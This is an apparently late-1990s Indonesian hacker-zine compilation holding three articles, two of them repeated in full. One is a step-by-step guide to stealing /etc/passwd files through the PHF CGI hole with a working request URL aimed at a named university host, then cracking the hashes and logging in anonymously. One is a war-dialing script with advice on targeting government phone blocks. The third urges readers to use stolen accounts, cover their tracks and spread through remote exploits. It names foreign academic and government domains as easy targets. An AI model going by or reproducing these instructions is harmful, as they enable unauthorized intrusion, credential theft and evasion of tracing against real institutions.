- Daftar kata (Wordlist/Dictionary). Favorit gue sih GlobalKOS KOSdict.
Sekitar 11.2 MB uncompressed!
- Komputer UMUM (yang nggak bisa di-trace)
- Komputer nganggur (sekitar 6 jam untuk file passwd ukuran medium). untuk yang satu ini nggak
mesti umum punya sebab fungsinya hanya untuk meng-crack
Prakteknya:
- Jalankan browser di komputer umummu (perpustakaan, rental)
- buka window baru (kita sebut window #2)
- dari window lama (window #1) jalankan altavista
- cari target-target potensial. Untuk yang satu ini penjelasan sedikit:
Target yang paling empuk adalah site-site akademis. Paling lezat kalau site-site akademis tsb
terletak di luar negeri. Paling yahud yang ada di negeri yahudi (israel) sebab Indonesia dan israel
tidak punya hubungan diplomatik maupun perjanjian deportasi. JANGAN coba-coba mengehack server milik
pemerintah Indonesia! Kalian nggak akan mendapat ampun! Nah, jika kamu sudah punya sesuatu dalam
pemikiran, contoh: site-site akademis di israel (domain= ac.il) maka
- di altavista, ada kolom yang berjudul "Search the web for ..." kamu isi
dengan: host:ac.il , lalu pilih "search"
- altavista akan menampilkan daftar server server yang memenuhi kriteria search kamu. modifikasi
sekeinginan hati. contoh: Untuk mendapatkan daftar target dari domainnya universitas Tel Aviv,
ketik host:tau.ac.il kamu akan dapetin nama nama webserver yang ada di sono. jadi kira-kira
akan muncul webpage dari server yang namanya www.tau.ac.il, www.cs.tau.ac.il dll. kalo kamu ngisi
host:co.jp maka yang akan ditampilin adalah host-host komersial di jepang (dlsb)
- pergilah ke Window #2. di kolom: "Location:" ketiklah:
http://nama.target.kamu/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
jangan lupa mengganti nama target dengan salah satu site yang terdapat di daftar sites kamu
dari window #1 contoh:
http://eris.wisdom.weizmann.ac.il/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
(percuma ngegunain host yang ada di contoh, file passwdnya kecil banget!)
- Kemungkinan ada empat:
1. Error message ... (dalam kasus ini, maka cukup kembali ke daftar target dan coba
target berikutnya.
2. Smile, you're on candid camera! (dalam kasus ini, informasi mengenai kamu direkam, nomor
ip dicatat dan akan disimpan di server! Hati-hati sebab kamu udah di-log, dan bisa di-trace!
Karena itu pakailah kondom dan gunakan KOMPUTER UMUM! dalam kasus ini kamu cuman bisa
ngusep-ngusep dada aja, deh!)
3. muncul tulisan yang menyerupai bentuk dibawah:
root:*:0:0:System Administrator:/:/bin/csh
sysadm:*:1:1: Bokeph Memendez:/usr/adm:/bin/bash dll dll.
perhatikan bahwa setelah tanda titik dua yang pertama, SELALU muncul tanda asterisk (*).
ini artinya kamu berhasil mendapatkan file passwd hanya saja sayangnya sang file sudah di-shadow
(nggak bisa dibaca oleh sembarang orang, perlu pangkat ROOT (tuhan) untuk ngebacanya!) Well, terpaksa
lanjutkan ke daftar target berikutnya ....
4. muncul tulisan yang menyerupai bentuk dibawah:
root:OUk9b8RqMRVNs:0:0:root,,,,,,,:/:/bin/csh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
leonid:F5AymuqmXVFCU:1399:8:Leonid Bebek:/usr/leonid:/bin/tcsh dll dll.
(Dalam kasus ini : CREEET! Dapet deh tuh file passwd asli! tanpa shadow!)
- Nah segera setelah file passwd didapatkan, "Save As" dan simpan di tempat yang aman!
- Terserah boleh kalo mau lanjutin ke target berikut atau segera meng-crack
- pastikan komputer untuk nge-crack aman dan bisa dibiarin nganggur selama berjamjam atau kalo
file passwdnya emang besar, berhari hari.
- jalankan program crack, gunakan wordlist atas file passwd yang baru kamu panen.
- kalo udah berhasil nge-crack, kamu udah siap untuk memakai shell unix 'baru' mu!
telnet aja ke servernya (jangan lupa pake komputer umum atau gunakan perlindungan (phreak dulu
teleponnya, login ke isp pake punya orang, dll!!!)). Isi dengan login dan passwd yang baru kamu
crack, silakan lihat-lihat sekitar. Kalo ada info menarik, jangan lupa dibagi-bagi!
Jika kamu ingin mengeksploitasi, coba jalankan eksploit-eksploit yang ada untuk mendapatkan root!
Gimana? Gampang khan? kalo enggak bisa, sih , kebangetan banget! Gitu dulu deh! Semoga ada manfaatnya!
Catatan PENTING:
JUNJUNGLAH ETIKA HACKER!!!! Jangan merusak!!! Jika kamu berhasil masuk (dan mendapatkan root).
Jangan, sekali lagi JANGAN jalankan perintah/program apapun yang kamu tidak tahu apa efeknya.
Pelajari bukumu, jalankan perintah-perintah sesuai petunjuk buku. JANGAN coba-coba menjalankan
eksploit tanpa tahu asal usul maupun pengertian mendalam tentang UNIX. Tulisan ini gue tulis dengan
maksud supaya kamu bisa mendapatkan sarana untuk belajar UNIX sebab gue percaya bahwa keinginan untuk
belajar tidak sepantasnya dihalangi oleh faktor ekonomi.
Catatan 1:
File passwd yang kamu dapat masih dalam bentuk terenkripsi, jadi kalo
dilihat:
root:2/.,1wEYqm3m3Q:Root Account:/:/bin/csh
| |
nama account |
password terenkripsi/tersandi
cara kerja program cracker adalah kurang lebih seperti ini:
1. baca kata #1 dari file kamus/wordlist
2. enkripisi dengan algoritma DES
3. baca baris 1 dari file passwd (account 1), baca nama account dan passwd terenkripsi
4. bandingkan apakah kata#1terenkripsi = passwd1terenkripsi
5. ya? beritahukan user/catat di log, tidak? baca baris2 file passwd, then.
catatan 2:
domain domain yang terkenal empuk:
ac.jp (akademis jepang)
ac.kr (akademis korea)
.edu (akademis amrik)
ac.uk (akademis inggris)
go.kr (pemerintah korea)
go.in (pemerintah india)
ac.ir (akademis iran)
com.il (komersil israel) dll dll.
Ciao
LithErr
referensi
Terbitan Online Kecoak Elektronik
http://k-elektronik.org
INSTANT SHELL UNIX
Oleh: LithErr - LithiumError (Kecoak Elektronik)
=================================================================================
Berikut adalah cara mendapatkan shell unix dalam waktu cepat buat kamu yang pingin belajar
sambil praktek tapi nggak mampu beli/install UNIX dengan memanfaatkan eksploit yang udah
cukup uzur cuman masih lumayan ampuh.
Bahan-bahan yang diperlukan:
- Web Browser (Netscape 3.0 disarankan karena cepat)
- Program Cracker (gunakan crackerjack atau star cracker)
- Daftar kata (Wordlist/Dictionary). Favorit gue sih GlobalKOS KOSdict.
Sekitar 11.2 MB uncompressed!
- Komputer UMUM (yang nggak bisa di-trace)
- Komputer nganggur (sekitar 6 jam untuk file passwd ukuran medium). untuk yang satu ini nggak
mesti umum punya sebab fungsinya hanya untuk meng-crack
Prakteknya:
- Jalankan browser di komputer umummu (perpustakaan, rental)
- buka window baru (kita sebut window #2)
- dari window lama (window #1) jalankan altavista
- cari target-target potensial. Untuk yang satu ini penjelasan sedikit:
Target yang paling empuk adalah site-site akademis. Paling lezat kalau site-site akademis tsb
terletak di luar negeri. Paling yahud yang ada di negeri yahudi (israel) sebab Indonesia dan israel
tidak punya hubungan diplomatik maupun perjanjian deportasi. JANGAN coba-coba mengehack server milik
pemerintah Indonesia! Kalian nggak akan mendapat ampun! Nah, jika kamu sudah punya sesuatu dalam
pemikiran, contoh: site-site akademis di israel (domain= ac.il) maka
- di altavista, ada kolom yang berjudul "Search the web for ..." kamu isi
dengan: host:ac.il , lalu pilih "search"
- altavista akan menampilkan daftar server server yang memenuhi kriteria search kamu. modifikasi
sekeinginan hati. contoh: Untuk mendapatkan daftar target dari domainnya universitas Tel Aviv,
ketik host:tau.ac.il kamu akan dapetin nama nama webserver yang ada di sono. jadi kira-kira
akan muncul webpage dari server yang namanya www.tau.ac.il, www.cs.tau.ac.il dll. kalo kamu ngisi
host:co.jp maka yang akan ditampilin adalah host-host komersial di jepang (dlsb)
- pergilah ke Window #2. di kolom: "Location:" ketiklah:
http://nama.target.kamu/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
jangan lupa mengganti nama target dengan salah satu site yang terdapat di daftar sites kamu
dari window #1 contoh:
http://eris.wisdom.weizmann.ac.il/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
(percuma ngegunain host yang ada di contoh, file passwdnya kecil banget!)
- Kemungkinan ada empat:
1. Error message ... (dalam kasus ini, maka cukup kembali ke daftar target dan coba
target berikutnya.
2. Smile, you're on candid camera! (dalam kasus ini, informasi mengenai kamu direkam, nomor
ip dicatat dan akan disimpan di server! Hati-hati sebab kamu udah di-log, dan bisa di-trace!
Karena itu pakailah kondom dan gunakan KOMPUTER UMUM! dalam kasus ini kamu cuman bisa
ngusep-ngusep dada aja, deh!)
3. muncul tulisan yang menyerupai bentuk dibawah:
root:*:0:0:System Administrator:/:/bin/csh
sysadm:*:1:1: Bokeph Memendez:/usr/adm:/bin/bash dll dll.
perhatikan bahwa setelah tanda titik dua yang pertama, SELALU muncul tanda asterisk (*).
ini artinya kamu berhasil mendapatkan file passwd hanya saja sayangnya sang file sudah di-shadow
(nggak bisa dibaca oleh sembarang orang, perlu pangkat ROOT (tuhan) untuk ngebacanya!) Well, terpaksa
lanjutkan ke daftar target berikutnya ....
4. muncul tulisan yang menyerupai bentuk dibawah:
root:OUk9b8RqMRVNs:0:0:root,,,,,,,:/:/bin/csh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
leonid:F5AymuqmXVFCU:1399:8:Leonid Bebek:/usr/leonid:/bin/tcsh dll dll.
(Dalam kasus ini : CREEET! Dapet deh tuh file passwd asli! tanpa shadow!)
- Nah segera setelah file passwd didapatkan, "Save As" dan simpan di tempat yang aman!
- Terserah boleh kalo mau lanjutin ke target berikut atau segera meng-crack
- pastikan komputer untuk nge-crack aman dan bisa dibiarin nganggur selama berjamjam atau kalo
file passwdnya emang besar, berhari hari.
- jalankan program crack, gunakan wordlist atas file passwd yang baru kamu panen.
- kalo udah berhasil nge-crack, kamu udah siap untuk memakai shell unix 'baru' mu!
telnet aja ke servernya (jangan lupa pake komputer umum atau gunakan perlindungan (phreak dulu
teleponnya, login ke isp pake punya orang, dll!!!)). Isi dengan login dan passwd yang baru kamu
crack, silakan lihat-lihat sekitar. Kalo ada info menarik, jangan lupa dibagi-bagi!
Jika kamu ingin mengeksploitasi, coba jalankan eksploit-eksploit yang ada untuk mendapatkan root!
Gimana? Gampang khan? kalo enggak bisa, sih , kebangetan banget! Gitu dulu deh! Semoga ada manfaatnya!
Catatan PENTING:
JUNJUNGLAH ETIKA HACKER!!!! Jangan merusak!!! Jika kamu berhasil masuk (dan mendapatkan root).
Jangan, sekali lagi JANGAN jalankan perintah/program apapun yang kamu tidak tahu apa efeknya.
Pelajari bukumu, jalankan perintah-perintah sesuai petunjuk buku. JANGAN coba-coba menjalankan
eksploit tanpa tahu asal usul maupun pengertian mendalam tentang UNIX. Tulisan ini gue tulis dengan
maksud supaya kamu bisa mendapatkan sarana untuk belajar UNIX sebab gue percaya bahwa keinginan untuk
belajar tidak sepantasnya dihalangi oleh faktor ekonomi.
Catatan 1:
File passwd yang kamu dapat masih dalam bentuk terenkripsi, jadi kalo
dilihat:
root:2/.,1wEYqm3m3Q:Root Account:/:/bin/csh
| |
nama account |
password terenkripsi/tersandi
cara kerja program cracker adalah kurang lebih seperti ini:
1. baca kata #1 dari file kamus/wordlist
2. enkripisi dengan algoritma DES
3. baca baris 1 dari file passwd (account 1), baca nama account dan passwd terenkripsi
4. bandingkan apakah kata#1terenkripsi = passwd1terenkripsi
5. ya? beritahukan user/catat di log, tidak? baca baris2 file passwd, then.
catatan 2:
domain domain yang terkenal empuk:
ac.jp (akademis jepang)
ac.kr (akademis korea)
.edu (akademis amrik)
ac.uk (akademis inggris)
go.kr (pemerintah korea)
go.in (pemerintah india)
ac.ir (akademis iran)
com.il (komersil israel) dll dll.
Ciao
LithErr
referensi
Terbitan Online Kecoak Elektronik
http://k-elektronik.org
WarDialing
Skanning Massal: Bagian 1 (WarDialing)
Oleh JiroKul (Kecoak Elektronik)
===============================================================================
Pendahuluan
-----------
Salah satu aspek yang paling menarik (dan seringkali menelan banyak waktu)
dalam serangan terhadap suatu network adalah tahap "pencarian", atau
pengenalan atas network tersebut. Artikel ini saya beri judul "Skanning"
sebab saya tidak bisa menjumpai ekuivalen dari kata "scan" atau "probe"
dalam bahasa Indonesia. "Scanning", sebagai metode untuk menemukan saluran
komunikasi yang bisa dieksploit sebenarnya bukanlah barang baru. Ide
pokoknya adalah untuk menelaah sebanyak mungkin saluran, dan menyimpan
hasilnya (saluran yang bisa dieksploit, tergantung dari keperluan anda).
Dalam bidang periklanan, hal ini adalah penyumbang terbesar dalam
metodologi mereka (tebarkan iklan sebanyak mungkin, dan pasti ada aja
seseorang yang bisa di-'eksploit' lebih lanjut) - termasuk "mass spamming"
dan lain sebagainya.
WarDialing
----------
"Scanning" memasuki dunia hacking/phreaking bersamaan dengan masuknya era
sistem telepon terkomputerisasi. Coba saja bayangkan, kita sudah mempunyai
sebuah jaringan global, semua bisa dicapai melalui nada dan kode telepon
kita. Dan di sebuah lokal, bisa terdapat jutaan nomor, namun mungkin yang
akan membuat kita benar-benar tertarik hanyalah sekitar 1 persen dari
seluruh nomor tersebut, mungkin nomor-nomor tersebut adalah kelompok nomor
yang menjawab panggilan dengan nada "carrier" (untuk mendengar contoh nada
'carrier' coba saja telepon langsung nomor telepon ISP anda). Solusi logis
dari permasalahan menjumpai nomor 'carrier' tersebut adalah tentu saja
dengan mencoba mendial sebanyak mungkin nomor untuk mengetahui nomor-nomor
mana saja yang merespon dengan 'carrier'. Dari sinilah aspek "war-dialing"
lahir. Pada prinsipnya, kita bisa dengan mudah menginstruksikan modem kita
untuk mendial banyak nomor dengan sedikit pengetahuan dasar dalam
instruksi standar modem. Lihat program singkat dibawah (ditulis dalam
batch language untuk DOS):
set port=1
set number1=3160000
set number2=3160001
set number3=3160002
cls
echo Mengaktifkan modem
echo ATDT>COM%port%
choice /c:ync /t:n,2
echo H1>COM%port%
choice /c:ync /t:n,2
cls
echo Mengaktifkan Modem
echo ATDT>COM%port%
choice /c:ync /t:n,2
echo H1>COM%port%
choice /c:ync /t:n,2
echo ATDT %number1% >COM%port%
echo H1 >COM%port%
echo ATDT %number2% >COM%port%
echo H1 >COM%port%
echo ATDT %number3% >COM%port%
...
prototipe program diatas akan secara berurutan mendial nomor telepon
3160000 sampai 316xxxx tergantung selera anda. Jelas program tersebut
masih sangat sederhana dan tidak mempunyai kemampuan menyimpan nomor mana
saja yang menjawab dengan carrier. Idenya sederhana: dial sebuah nomor,
jika modem menjawab dengan CONNECT, simpan nomor tersebut, dan lanjutkan
ke nomor berikutnya, dan seterusnya. Program-program WarDialing banyak
bertebaran di Internet, yang terkenal adalah CatCalls dan ToneLoc,
keduanya bisa di-download dari arsip kecoak. direktori
/eksploit/fonedialer.
Aplikasi WarDialing
-------------------
Tentu saja kamu bisa menginstruksikan komputermu untuk mendial seluruh
nomor dari 000-0000 sampai 999-9999, tapi bayangkan berapa banyak waktu
yang diperlukan. Untuk mereka yang cermat, solusinya jelas, untuk
memperpendek rentang nomor yang ditargetkan. Untuk menjumpai nomor-nomor
potensial yang bisa ditargetkan biasanya digunakan sedikit guide seperti:
1. Coba perusahaan besar atau institusi pemerintah
2. Lihat di buku telepon nomor yang mereka punyai
3. Karena biasanya perusahaan atau institusi pemerintah mempunyai blok
nomor sekaligus (Contoh, misalnya target kamu adalah BPPT, dan lihat bahwa
nomor-nomor telepon kantor mereka berkepala 314, 315, dan 316, maka bisa
dicoba mulai dari 314-0000 sampai 316-9999).
4. Ingatlah bahwa kamu hanya masih dalam tahap 'meraba-raba', jadi ada
kemungkinan modem kamu bertemu dengan manusia biasa, mesin penjawab
telepon, mesin faksimil, bermacam-macam PBX atau PABX, bermacam-macam
sistem komputer lain, dan banyak lagi kemungkinan). Dari semua nomor yang
direkam oleh ToneLoc/CatCall sebagai 'carrier tone', perlu kamu konfirmasi
secara manual apa sebenarnya yang menjawab. Ada kemungkinan (besar) kamu
bertemu sebuah prompt untuk sistem tertentu, cari informasi lebih lanjut
tentang sistem tersebut lewat internet (coba lihat apakah ada eksploitnya,
siapa pembuatnya, dll). Untuk daftar prompt-prompt yang familiar, lihat
lagi artikel HackingFAQ kecoak di edisi #1.
Catatan Akhir
-------------
Sampai disini dulu artikel scanning ini. Satu kata peringatan adalah agar
pembaca semua menerapkan kehati-hatian (seperti anonimitas, dll) dalam
eksplorasi ini. Jangan takut untuk mencoba, tapi tetaplah berhati-hati.
Jangan lupa baca artikel berikutnya mengenai scanning melalui TCP/IP.
-JiroKul
referensi :
Oleh JiroKul (Kecoak Elektronik)
===============================================================================
Pendahuluan
-----------
Salah satu aspek yang paling menarik (dan seringkali menelan banyak waktu)
dalam serangan terhadap suatu network adalah tahap "pencarian", atau
pengenalan atas network tersebut. Artikel ini saya beri judul "Skanning"
sebab saya tidak bisa menjumpai ekuivalen dari kata "scan" atau "probe"
dalam bahasa Indonesia. "Scanning", sebagai metode untuk menemukan saluran
komunikasi yang bisa dieksploit sebenarnya bukanlah barang baru. Ide
pokoknya adalah untuk menelaah sebanyak mungkin saluran, dan menyimpan
hasilnya (saluran yang bisa dieksploit, tergantung dari keperluan anda).
Dalam bidang periklanan, hal ini adalah penyumbang terbesar dalam
metodologi mereka (tebarkan iklan sebanyak mungkin, dan pasti ada aja
seseorang yang bisa di-'eksploit' lebih lanjut) - termasuk "mass spamming"
dan lain sebagainya.
WarDialing
----------
"Scanning" memasuki dunia hacking/phreaking bersamaan dengan masuknya era
sistem telepon terkomputerisasi. Coba saja bayangkan, kita sudah mempunyai
sebuah jaringan global, semua bisa dicapai melalui nada dan kode telepon
kita. Dan di sebuah lokal, bisa terdapat jutaan nomor, namun mungkin yang
akan membuat kita benar-benar tertarik hanyalah sekitar 1 persen dari
seluruh nomor tersebut, mungkin nomor-nomor tersebut adalah kelompok nomor
yang menjawab panggilan dengan nada "carrier" (untuk mendengar contoh nada
'carrier' coba saja telepon langsung nomor telepon ISP anda). Solusi logis
dari permasalahan menjumpai nomor 'carrier' tersebut adalah tentu saja
dengan mencoba mendial sebanyak mungkin nomor untuk mengetahui nomor-nomor
mana saja yang merespon dengan 'carrier'. Dari sinilah aspek "war-dialing"
lahir. Pada prinsipnya, kita bisa dengan mudah menginstruksikan modem kita
untuk mendial banyak nomor dengan sedikit pengetahuan dasar dalam
instruksi standar modem. Lihat program singkat dibawah (ditulis dalam
batch language untuk DOS):
set port=1
set number1=3160000
set number2=3160001
set number3=3160002
cls
echo Mengaktifkan modem
echo ATDT>COM%port%
choice /c:ync /t:n,2
echo H1>COM%port%
choice /c:ync /t:n,2
cls
echo Mengaktifkan Modem
echo ATDT>COM%port%
choice /c:ync /t:n,2
echo H1>COM%port%
choice /c:ync /t:n,2
echo ATDT %number1% >COM%port%
echo H1 >COM%port%
echo ATDT %number2% >COM%port%
echo H1 >COM%port%
echo ATDT %number3% >COM%port%
...
prototipe program diatas akan secara berurutan mendial nomor telepon
3160000 sampai 316xxxx tergantung selera anda. Jelas program tersebut
masih sangat sederhana dan tidak mempunyai kemampuan menyimpan nomor mana
saja yang menjawab dengan carrier. Idenya sederhana: dial sebuah nomor,
jika modem menjawab dengan CONNECT, simpan nomor tersebut, dan lanjutkan
ke nomor berikutnya, dan seterusnya. Program-program WarDialing banyak
bertebaran di Internet, yang terkenal adalah CatCalls dan ToneLoc,
keduanya bisa di-download dari arsip kecoak. direktori
/eksploit/fonedialer.
Aplikasi WarDialing
-------------------
Tentu saja kamu bisa menginstruksikan komputermu untuk mendial seluruh
nomor dari 000-0000 sampai 999-9999, tapi bayangkan berapa banyak waktu
yang diperlukan. Untuk mereka yang cermat, solusinya jelas, untuk
memperpendek rentang nomor yang ditargetkan. Untuk menjumpai nomor-nomor
potensial yang bisa ditargetkan biasanya digunakan sedikit guide seperti:
1. Coba perusahaan besar atau institusi pemerintah
2. Lihat di buku telepon nomor yang mereka punyai
3. Karena biasanya perusahaan atau institusi pemerintah mempunyai blok
nomor sekaligus (Contoh, misalnya target kamu adalah BPPT, dan lihat bahwa
nomor-nomor telepon kantor mereka berkepala 314, 315, dan 316, maka bisa
dicoba mulai dari 314-0000 sampai 316-9999).
4. Ingatlah bahwa kamu hanya masih dalam tahap 'meraba-raba', jadi ada
kemungkinan modem kamu bertemu dengan manusia biasa, mesin penjawab
telepon, mesin faksimil, bermacam-macam PBX atau PABX, bermacam-macam
sistem komputer lain, dan banyak lagi kemungkinan). Dari semua nomor yang
direkam oleh ToneLoc/CatCall sebagai 'carrier tone', perlu kamu konfirmasi
secara manual apa sebenarnya yang menjawab. Ada kemungkinan (besar) kamu
bertemu sebuah prompt untuk sistem tertentu, cari informasi lebih lanjut
tentang sistem tersebut lewat internet (coba lihat apakah ada eksploitnya,
siapa pembuatnya, dll). Untuk daftar prompt-prompt yang familiar, lihat
lagi artikel HackingFAQ kecoak di edisi #1.
Catatan Akhir
-------------
Sampai disini dulu artikel scanning ini. Satu kata peringatan adalah agar
pembaca semua menerapkan kehati-hatian (seperti anonimitas, dll) dalam
eksplorasi ini. Jangan takut untuk mencoba, tapi tetaplah berhati-hati.
Jangan lupa baca artikel berikutnya mengenai scanning melalui TCP/IP.
-JiroKul
referensi :
Menjadi unix h4ck3r
Menjadi UNIX Hacker
Oleh: LithErr - LithiumError (Kecoak Elektronik
Jadi kamu memutuskan untuk menjadi seorang hacker UNIX tapi kami nggak tau gimana mulainya?
Sebelum kamu benar-benar mulai, pastikan bahwa hal-hal berikut ini adalah jelas:
(Pastikan juga bahwa kamu mengerti, bahwa tidak ada satupun anggota 'Kecoak' yang mengklaim
diri sebagai 'hackers'. Bagi kami yang terpenting adalah eksplorasi dan eksploitasi, *grins*
[1] Hacking adalah kerja keras. Hacking bukanlah tempat bermain anak-anak yang hanya ingin
mendapat 15 menit secara cuma-cuma. Kamu harus belajar bagaimana caranya mengoperasikan
dan memprogram sebuah system. Kamu mesti ngeriset bagaimana mesin-mesin bereaksi dan
membaca kode-kode asli. Ini adalah proses yang panjang dan sukar - inilah peringatan
untuk kamu!
[2] Hacking adalah ilegal. Masuk ke jaringan komputer tanpa izin adalah ilegal, paling tidak
di banyak negara (hanya Belanda dan Argentina kalo nggak salah yang belum punya hukum
mengenai hacking. Belum aja, sih ... paling juga nanti akan ada.) Walaupun hanya log-on
ke sebuah sustem dengan menggunakan account bukan milikmu adalah tindakan pidana yang bisa
dikenakan hukuman. Sekali sang hakim menjatuhkan hukuman, maka hukuman tersebut akan
dimasukkan ke data hidup / arsip kamu. Seluruh hidup kamu mungkin bisa terlantar karena
hanya sedikit perusahaan yang bersedia menerima hacker sebagai karyawan. Ini serius.
Apalagi di Indonesia. Jika kamu meng-hacking server milik pemerintah, bisa dijamin kamu akan
amblas. Dan keluarga kamu nggak aman! Beberapa anggota kami nggak bisa balik lagi ke tanah
air karena sudah dicekal, dan terakhir, pemerintah mulai menyelidiki asal-usul ChiKo dan
mencari keluarganya di Indonesia.
[3] Hacking memerlukan banyak waktu. Kamu nggak mungkin cuman nge-hack selama setengah thun,
terus berhenti dan istirahat selama tiga bulan, lalu kembali lagi. Waktu berjalan cepat di
internet. Rilis baru UNIX, bug-bug baru, dan juga fix-fix nya. Sekali kamu ketinggalan jaman
dengan eksploit data milikmu, kamu mesti mengemis-ngemis ke orang lain untuk memberikan
barang-barang baru kepadamu, dan jika kamu melakukan hal tsb terlalu sering, mereka nggak
akan begitu senang jadinya. 50% dari waktu hacking sebenarnya dihabiskan untuk mengumpulkan
informasi. Bicaralah ke hacker-hacker lainnya, baca mailing lists dan newsgroups, jangan lupa
situs-situs www dan ftp yang bagus.
Tapi apa motivasi kamu untuk secara benar-benar melakukan 'unix hacking'? Itu terserah kamu. Kamu
ingin menjadi salah satunya, maka pikirkan lagi mengapa kamu ingin menjadi salah satu unix hacker.
Lupakan film-film seperti "The Net" ataupun "Hackers" - film-film tsb BUKANLAH realita! Lupakan
mimpi-mimpi menjadi pahlawan, mengehack Pentagon atau HanKam dan menjadi cowok terseksi, mendapat
pacar-pacar yang cantik dan pada akhirnya bekerja untuk sebuah perusahaan keamanan sistem dengan gaji
berjibun ;o). Hal-hal tersebut BUKANLAH apa yang akan terjadi - jadi, pastikanlah bahwa alasan kamu
jelas, mengapa kamu ingin menjadi hacker dan apa yang kamu harapkan dari hacking. Bisakah kamu
bayangkan ibundamu tercinta, tersedu-sedu saat polisi datang untuk menahanmu?
Ingatlah peringatan-peringatan ini. Ini kami jadikan peringatan untuk memastikan bahwa kamu
menyadari apa yang kamu lakukan dan kamu ingin menjadi apa.
Catatan juga bahwa kami menulis petunjuk singkat ini sebab seringkali kami mendapat pertanyaan
dari banyak orang, "Gimana caranya supaya gue jadi jago nge-hack UNIX?" - dan dari waktu ke waktu
kami menjadi makin cape ngejawabinnya. Maka ... inilah dia jawaban-jawabannya. Jangan salahkan
kami atas ketidaklengkapan ataupun kesalahan- kami udah nggak peduli lagi dengan permintaan-permintaan
ngajarin nge-hack lewat jalan potong. Hanya yang paling tahan bantinglah yang bertahan - jadi,
cobalah mendapatkan sebanyak mungkin melalui teks ini jika kamu benar-benar masih pemula. Kami
sendiri masih belum pantas menyandang gelar "hacker" karena kami merasa masih jauh sekali tertinggal
oleh rekan-rekan kebangsaan lain dan kami masih selalu dalam proses mempelajari segalanya.
Gimana cara mulainya
[1] Kenalilah sang sistem - atau - gimana caranya kamu bisa menang rodeo tanpa belajar
caranya menunggang kuda?
[2] Dapatkan distribusi unix. Cobalah mendapatkan Linux, FreeBSD, Solaris, Sinix dll. untuk PC
kamu. Linux dan FreeBSD adalah sistem-sistem murah (kadang-kadang gratis!) yang berasal dari
BSD, sedangkan Solaris dan Sinix adalah sistem-sistem mahal yang berasal dari System V.
Tip: Carilah distribusi linux yang punya buku pegangan yang cukup bagus. Kamu mesti mempelajari
bagaimana caranya mengoperasikan unix. Pelajarilah dasar-dasarnya, seperti mengganti direktori,
perintah-perintah menyalin dan menghapus dan menggunakan program penyunting.
[3] Motivasi dirimu sendiri untuk secara benar-benar menggunakan UNIX. Gimana caranya memotivasi
- itu terserah kamu sendiri. Mungkin dengan menggunakan databasi yang ada di distribusi unix
kamu, membuat program dalam C untuk sekolah/universitas kamu, apa aja lah, yang jelas kamu
mesti benar-benar menggunakan unix (seperti jamannya ngetik perintah di DOS dulu).
[4] Beli beberapa buku untuk menolong kamu. Diluar sana ada banyak, jadi, pergilah ke toko buku
terkemuka, paling bagus didekat sebuah universitas, dimana banyak orang-orang yang bisa menolong
memberitahukan buku-buku apa yang cukup baik mengenai unix. Buku-buku Nutshell terbitan O'reilly
(dan terjemahannya) kami sukai, namun ini adalah opini pribadi. Kamu mungkin mau mulai dengan
seri For Dummies terbitan IDG (banyak yang bahasa Indonesianya. Baca FAQ untuk judul-judul lain.
[5] Dapatkan internet account dengan PPP dan/atau akses shell (hubungi ISPmu). JANGAN SEKALI-KALI
menge-hack atau bertukar informasi mengenai hacking (tanpa PGP) dengan menggunakan account milik
kamu sendiri (atau account dibawah nama/alamat/telepon kamu!). Coba untuk mengkonfigurasikan PC
unix kamu untuk menghubungkan diri ke Internet provider. Beberapa distribusi Linux dilengkapi
dengan sebuah buku petunjuk dimana mereka menggambarkan gimana caranya untuk menyambungkan ke
internet. Jika kamu sudah mengikuti 5 langkah tsb diatas dan mengetahui caranya mengoperasikan
unix (ini akan makan waktu sekitar 2 - 8 minggu) maka kamu sebaiknya melanjutkan ke langkah
berikutnya:
Pelajari Dasar-Dasarnya!
[6] Kembalilah ke toko buku, kali ini carilah buku-buku mengenai unix dan keamanan internet.
Beberapa buku terbitan Elex Media membahas hal ini. Buku-buku berbahasa inggris antara lain
"Practical Unix Security" oleh Garfinkel and Spafford. Pelajari masalah-masalah keamanan dasar,
'holes' dan ciri-ciri apa yang ada di unix, dan kesalahan-kesalahan apa yang sering orang-orang
lakukan.
[7] Cobalah untuk mendapatkan semua informasi dan file-file yang kamu bisa temukan di internet.
Selidiki situs-situs www dan ftp dan gunakan mesin pencari. Berlangganlah ke mailing list mengenai
keamanan yang cukup penting dan bacalah newsgroups yang mungkin bisa jadi penting. Tanya-tanya
di sekeliling di IRC mengenai situs-situs yang bagus. berikut adalah situs-situs untuk permulaan:
http://underground.org
ftp://onyx.infonexus.com/
(*Catatan editor: karena tulisan ini ditulis sekitar tahun 1997
dan kedua situs tersebut sudah tidak aktif, makan silahkan
kunjungi situs berikut -- scut*)
http://wks.uts.ohio-state.edu/unix_course/unix.html
http://www.mcsr.olemiss.edu/unixhelp/
Dan tentu saja link-link di "Kecoak Elektronik" ;-)
bugtraq mailing list ->
http://www.securityfocus.com/archive/1
[8] Baca dan analisa file-file hasil kumpulan kamu - dan jangan cuman dikumpulin aja.
Jika kata-kata seperti suid, buffer overflow, firewall, rdist, nis, nfs, dan SATAN sudah menjadi bukan
rahasia lagi bagi kamu dan kamu benar-benar mengetahui apa makna dan konsekwensi kata-kata tersebut,
...lanjutkan.
Mulai Hacking
[9] Dapatkan sebuah account yang bukan milikmu! Coba minta dari hacker yang kamu kenal/jumpai.
Atau gunakan metode-metode yang ada di FAQ. Ingatlah: jangan coba-coba nge-hack dari account
milik kamu sendiri!
[10] Dengan account ini kamu bisa mencoba untuk menge-hack sistem pertamamu. Coba eksploit-
eksploitmu. Tapi ingatlah untuk selalu untuk menutupi jejak (artikel akan segera menyusul)
supaya account ilegal milikmu tidak menjadi sejarah setelah baru sekali dipakai!
[11] Gunakan ypx, eksploit - eksploit remote sendmail, insecure NFS exports, dll untuk mendapatkan
host-host lainnya. Kamu bisa menjadi benar-benar sukses dengan barang "lama" ini jika kamu
menggunakan daftar host yang cukup besar dan skrip tulis/temukan (write/find) yang
mengotomatisasi proses penge-test-an untuk kamu. Tapi dimana bisa ditemukan nama-nama host
untuk membuat daftar host? Banyak kemungkinan. Coba irc, /etc/hosts, www, data analisis
statistik dari akses-akses internet atau www, dll. Ini akan memberikan kamu banyak host dengan
account-account yang ada.
